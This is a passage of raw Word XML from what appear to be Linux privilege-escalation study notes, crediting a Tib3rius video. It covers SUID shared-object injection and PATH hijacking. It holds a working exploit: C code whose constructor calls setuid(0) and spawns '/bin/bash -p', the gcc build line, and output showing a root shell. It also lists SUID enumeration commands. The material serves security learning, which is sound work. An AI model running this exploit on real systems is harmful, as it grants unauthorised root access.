      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suid-so file should execute with root user permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run strace on the SUID file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ strace /usr/local/bin/suid-so 2&gt;&amp;1 | grep -iE "open|access|no such file"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The libcalc.so shared object could not be found, and the program is looking in our user’s home directory, which we can write to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create the /home/user/.config directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create the file libcalc.c with the following contents:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F9">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020FA">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020FB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">static void inject() __attribute__((constructor));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020FC">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">void inject() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020FD">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setuid(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020FE">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/bin/bash -p");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002100">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compile libcalc.c into /home/user/.config/</w:t>
      </w:r>
      <w:hyperlink r:id="rId703">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">libcalc.so</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -shared -fPIC -o /home/user/.config/libcalc.so libcalc.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002102">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the SUID executable to get a root shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002103">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ /usr/local/bin/suid-so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002104">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Calculating something, please wait...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002105">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash-4.1# id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002106">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=1000(user) egid=50(staff) groups=0(root) ..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002107">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002108">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002109">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_67i544g0iptw" w:id="288"/>
      <w:bookmarkEnd w:id="288"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH Environment Variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000210A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000210B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius SUID Video</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000210C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000210D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH Environment Variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000210E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="763"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The PATH environment variable contains a list of directories where the shell should try to find programs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000210F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="763"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a program tries to execute another program, but only specifies the program name, rather than its full (absolute) path, the shell will search the PATH directories until it is found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002110">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="763"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since a user has full control over their PATH variable, we can tell the shell to first look for programs in a directory we can write to.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002111">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002112">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding Vulnerable Programs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002113">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="974"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a program tries to execute another program, the name of that program is likely embedded in the executable file as a string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002114">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="974"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can run strings on the executable file to find strings of characters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002115">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="974"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also use strace to see how the program is executing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002116">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="974"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another program called ltrace may also be of use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002117">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002118">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="974"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running strings against a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002119">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="974"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings /path/to/file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000211A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="974"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running strace against a command (alternative to strings):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000211B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="974"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strace -v -f -e execve &lt;command&gt; 2&gt;&amp;1 | grep exec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000211C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="974"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running ltrace against a command (alternative to strings):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000211D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="974"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ltrace &lt;command&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000211E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000211F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002120">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find SUID/SGID files on the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002121">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002122">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
